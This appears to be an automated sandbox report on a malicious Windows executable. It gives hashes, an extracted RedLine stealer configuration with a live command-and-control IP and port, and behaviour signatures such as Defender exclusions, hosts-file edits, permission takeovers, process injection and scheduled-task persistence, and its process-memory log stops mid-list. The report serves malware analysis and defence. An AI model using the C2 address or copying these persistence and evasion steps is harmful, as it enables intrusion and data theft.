Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-11-2024 10:48
Static task
static1
Behavioral task
behavioral1
Sample
06293c3726a8b6029225668dcfb8c7e8.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
06293c3726a8b6029225668dcfb8c7e8.exe
Resource
win10v2004-20241007-en
General
-
Target
06293c3726a8b6029225668dcfb8c7e8.exe
-
Size
7.3MB
-
MD5
06293c3726a8b6029225668dcfb8c7e8
-
SHA1
1db3a38e9cff8b2aec7b73668e6768002c2bddbf
-
SHA256
ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c
-
SHA512
33a80c1dec409c83d82cb9e1149a90ca11024d726b58b83035ab149b22989c4406cacab57adf6da5ce0d49cb393d4c2fcf58cd2491d0b0c0c5382e06bc35f376
-
SSDEEP
196608:68waBBQvE8waBBQv36od0Ntiq0rG6MvF:68waB+88waB+/jwtivrr
Malware Config
Extracted
redline
Lucifer
162.55.169.73:49194
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\explorer.exe family_redline behavioral2/memory/1584-14-0x0000000000650000-0x000000000066E000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\explorer.exe family_sectoprat behavioral2/memory/1584-14-0x0000000000650000-0x000000000066E000-memory.dmp family_sectoprat -
Sectoprat family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4328 created 584 4328 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exepid process 2768 powershell.exe 1928 powershell.exe 4328 powershell.EXE 2196 powershell.EXE 1300 powershell.exe -
Drops file in Drivers directory 4 IoCs
Processes:
conhost.execonhost.execonhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exepid process 4088 icacls.exe 1128 takeown.exe 2992 icacls.exe 5852 takeown.exe 5948 icacls.exe 5448 takeown.exe 2692 icacls.exe 5260 takeown.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
windowshost.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation windowshost.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 7 IoCs
Processes:
svchost.exewindowshost.exeexplorer.exesvchost.execominto.exeupdater.exeupdater.exepid process 4340 svchost.exe 2104 windowshost.exe 1584 explorer.exe 2252 svchost.exe 912 cominto.exe 5688 updater.exe 4468 updater.exe -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exepid process 2692 icacls.exe 5260 takeown.exe 4088 icacls.exe 1128 takeown.exe 2992 icacls.exe 5852 takeown.exe 5948 icacls.exe 5448 takeown.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 20 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.execmd.exepowercfg.execmd.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 3232 powercfg.exe 964 powercfg.exe 5692 powercfg.exe 3172 cmd.exe 100 powercfg.exe 4660 cmd.exe 5208 powercfg.exe 2256 cmd.exe 5500 powercfg.exe 2528 powercfg.exe 3024 powercfg.exe 1972 powercfg.exe 5720 powercfg.exe 4992 cmd.exe 2536 powercfg.exe 2220 powercfg.exe 4384 powercfg.exe 5156 powercfg.exe 3740 powercfg.exe 2864 powercfg.exe -
Drops file in System32 directory 13 IoCs
Processes:
svchost.exeOfficeClickToRun.exepowershell.EXEpowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 5 IoCs
Processes:
conhost.execonhost.exepowershell.EXEconhost.execonhost.exedescription pid process target process PID 4548 set thread context of 2220 4548 conhost.exe powercfg.exe PID 964 set thread context of 3088 964 conhost.exe conhost.exe PID 4328 set thread context of 760 4328 powershell.EXE dllhost.exe PID 6044 set thread context of 2992 6044 conhost.exe conhost.exe PID 2684 set thread context of 5336 2684 conhost.exe conhost.exe -
Drops file in Windows directory 8 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe -
Launches sc.exe 60 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 5756 sc.exe 5832 sc.exe 1476 sc.exe 5564 sc.exe 5236 sc.exe 4532 sc.exe 372 sc.exe 4312 sc.exe 3176 sc.exe 4896 sc.exe 2548 sc.exe 4540 sc.exe 5540 sc.exe 3352 sc.exe 228 sc.exe 5216 sc.exe 5152 sc.exe 4456 sc.exe 5360 sc.exe 5744 sc.exe 5672 sc.exe 5132 sc.exe 3172 sc.exe 1616 sc.exe 5272 sc.exe 372 sc.exe 4248 sc.exe 5428 sc.exe 4268 sc.exe 6104 sc.exe 2880 sc.exe 2772 sc.exe 5940 sc.exe 3612 sc.exe 5988 sc.exe 5864 sc.exe 3724 sc.exe 3176 sc.exe 3520 sc.exe 5728 sc.exe 3580 sc.exe 5464 sc.exe 5636 sc.exe 5776 sc.exe 5960 sc.exe 1280 sc.exe 6036 sc.exe 1976 sc.exe 2056 sc.exe 5504 sc.exe 5724 sc.exe 4268 sc.exe 3024 sc.exe 2696 sc.exe 5360 sc.exe 3620 sc.exe 5660 sc.exe 6080 sc.exe 5952 sc.exe 5784 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exepowershell.exepowershell.exe06293c3726a8b6029225668dcfb8c7e8.execmd.execmd.exeexplorer.exeWScript.execmd.execmd.exewindowshost.exepowershell.EXEcmd.execmd.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 06293c3726a8b6029225668dcfb8c7e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language windowshost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
svchost.exepowershell.EXEpowershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={D750C836-6DA6-467B-A44A-33C88B5171B5}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 07 Nov 2024 10:49:38 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe -
Modifies registry class 2 IoCs
Processes:
windowshost.exeExplorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings windowshost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2456 schtasks.exe 3620 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exepowershell.EXEpowershell.EXEdllhost.exepid process 1300 powershell.exe 2768 powershell.exe 1300 powershell.exe 2768 powershell.exe 1928 powershell.exe 1928 powershell.exe 1176 powershell.exe 1176 powershell.exe 3976 powershell.exe 3976 powershell.exe 3976 powershell.exe 1176 powershell.exe 4548 conhost.exe 4548 conhost.exe 964 conhost.exe 2196 powershell.EXE 4328 powershell.EXE 4328 powershell.EXE 4328 powershell.EXE 2196 powershell.EXE 2196 powershell.EXE 4328 powershell.EXE 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe 760 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exeexplorer.execominto.exepowershell.exepowershell.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowershell.EXEpowershell.EXEpowercfg.exepowercfg.exepowercfg.exedllhost.exeExplorer.EXEsvchost.exepowershell.exepowershell.execonhost.exesvchost.exepowercfg.exedescription pid process Token: SeDebugPrivilege 1300 powershell.exe Token: SeDebugPrivilege 2768 powershell.exe Token: SeDebugPrivilege 1584 explorer.exe Token: SeDebugPrivilege 912 cominto.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 1176 powershell.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeDebugPrivilege 4548 conhost.exe Token: SeShutdownPrivilege 3740 powercfg.exe Token: SeCreatePagefilePrivilege 3740 powercfg.exe Token: SeShutdownPrivilege 2864 powercfg.exe Token: SeCreatePagefilePrivilege 2864 powercfg.exe Token: SeShutdownPrivilege 2528 powercfg.exe Token: SeCreatePagefilePrivilege 2528 powercfg.exe Token: SeShutdownPrivilege 3024 powercfg.exe Token: SeCreatePagefilePrivilege 3024 powercfg.exe Token: SeDebugPrivilege 964 conhost.exe Token: SeShutdownPrivilege 100 powercfg.exe Token: SeCreatePagefilePrivilege 100 powercfg.exe Token: SeDebugPrivilege 2196 powershell.EXE Token: SeDebugPrivilege 4328 powershell.EXE Token: SeShutdownPrivilege 2536 powercfg.exe Token: SeCreatePagefilePrivilege 2536 powercfg.exe Token: SeShutdownPrivilege 3232 powercfg.exe Token: SeCreatePagefilePrivilege 3232 powercfg.exe Token: SeShutdownPrivilege 2220 powercfg.exe Token: SeCreatePagefilePrivilege 2220 powercfg.exe Token: SeDebugPrivilege 4328 powershell.EXE Token: SeDebugPrivilege 760 dllhost.exe Token: SeShutdownPrivilege 3528 Explorer.EXE Token: SeCreatePagefilePrivilege 3528 Explorer.EXE Token: SeShutdownPrivilege 3528 Explorer.EXE Token: SeCreatePagefilePrivilege 3528 Explorer.EXE Token: SeAuditPrivilege 2592 svchost.exe Token: SeShutdownPrivilege 3528 Explorer.EXE Token: SeCreatePagefilePrivilege 3528 Explorer.EXE Token: SeShutdownPrivilege 3528 Explorer.EXE Token: SeCreatePagefilePrivilege 3528 Explorer.EXE Token: SeShutdownPrivilege 3528 Explorer.EXE Token: SeCreatePagefilePrivilege 3528 Explorer.EXE Token: SeShutdownPrivilege 3528 Explorer.EXE Token: SeCreatePagefilePrivilege 3528 Explorer.EXE Token: SeShutdownPrivilege 3528 Explorer.EXE Token: SeCreatePagefilePrivilege 3528 Explorer.EXE Token: SeShutdownPrivilege 3528 Explorer.EXE Token: SeCreatePagefilePrivilege 3528 Explorer.EXE Token: SeDebugPrivilege 1812 powershell.exe Token: SeDebugPrivilege 3232 powershell.exe Token: SeShutdownPrivilege 3528 Explorer.EXE Token: SeCreatePagefilePrivilege 3528 Explorer.EXE Token: SeDebugPrivilege 6044 conhost.exe Token: SeAssignPrimaryTokenPrivilege 1772 svchost.exe Token: SeIncreaseQuotaPrivilege 1772 svchost.exe Token: SeSecurityPrivilege 1772 svchost.exe Token: SeTakeOwnershipPrivilege 1772 svchost.exe Token: SeLoadDriverPrivilege 1772 svchost.exe Token: SeSystemtimePrivilege 1772 svchost.exe Token: SeBackupPrivilege 1772 svchost.exe Token: SeRestorePrivilege 1772 svchost.exe Token: SeShutdownPrivilege 1772 svchost.exe Token: SeSystemEnvironmentPrivilege 1772 svchost.exe Token: SeUndockPrivilege 1772 svchost.exe Token: SeManageVolumePrivilege 1772 svchost.exe Token: SeShutdownPrivilege 4384 powercfg.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 3528 Explorer.EXE 3528 Explorer.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
Conhost.exeConhost.exeConhost.exeConhost.exeConhost.exepid process 5284 Conhost.exe 5440 Conhost.exe 5888 Conhost.exe 5280 Conhost.exe 1020 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
06293c3726a8b6029225668dcfb8c7e8.execmd.execmd.execmd.execmd.execmd.execmd.exewindowshost.exeWScript.execmd.exesvchost.exesvchost.execonhost.execonhost.execmd.execmd.exedescription pid process target process PID 1384 wrote to memory of 4432 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 4432 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 4432 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 4148 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 4148 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 4148 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 1168 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 1168 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 1168 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 3172 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 3172 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 3172 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 2668 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 2668 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 2668 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 3968 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 3968 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 1384 wrote to memory of 3968 1384 06293c3726a8b6029225668dcfb8c7e8.exe cmd.exe PID 4432 wrote to memory of 1300 4432 cmd.exe powershell.exe PID 4432 wrote to memory of 1300 4432 cmd.exe powershell.exe PID 4432 wrote to memory of 1300 4432 cmd.exe powershell.exe PID 4148 wrote to memory of 2768 4148 cmd.exe powershell.exe PID 4148 wrote to memory of 2768 4148 cmd.exe powershell.exe PID 4148 wrote to memory of 2768 4148 cmd.exe powershell.exe PID 1168 wrote to memory of 4340 1168 cmd.exe svchost.exe PID 1168 wrote to memory of 4340 1168 cmd.exe svchost.exe PID 3968 wrote to memory of 2104 3968 cmd.exe windowshost.exe PID 3968 wrote to memory of 2104 3968 cmd.exe windowshost.exe PID 3968 wrote to memory of 2104 3968 cmd.exe windowshost.exe PID 2668 wrote to memory of 1584 2668 cmd.exe explorer.exe PID 2668 wrote to memory of 1584 2668 cmd.exe explorer.exe PID 2668 wrote to memory of 1584 2668 cmd.exe explorer.exe PID 3172 wrote to memory of 2252 3172 cmd.exe svchost.exe PID 3172 wrote to memory of 2252 3172 cmd.exe svchost.exe PID 2104 wrote to memory of 3520 2104 windowshost.exe sc.exe PID 2104 wrote to memory of 3520 2104 windowshost.exe sc.exe PID 2104 wrote to memory of 3520 2104 windowshost.exe sc.exe PID 3520 wrote to memory of 1856 3520 WScript.exe cmd.exe PID 3520 wrote to memory of 1856 3520 WScript.exe cmd.exe PID 3520 wrote to memory of 1856 3520 WScript.exe cmd.exe PID 1856 wrote to memory of 912 1856 cmd.exe cominto.exe PID 1856 wrote to memory of 912 1856 cmd.exe cominto.exe PID 4148 wrote to memory of 1928 4148 cmd.exe powershell.exe PID 4148 wrote to memory of 1928 4148 cmd.exe powershell.exe PID 4148 wrote to memory of 1928 4148 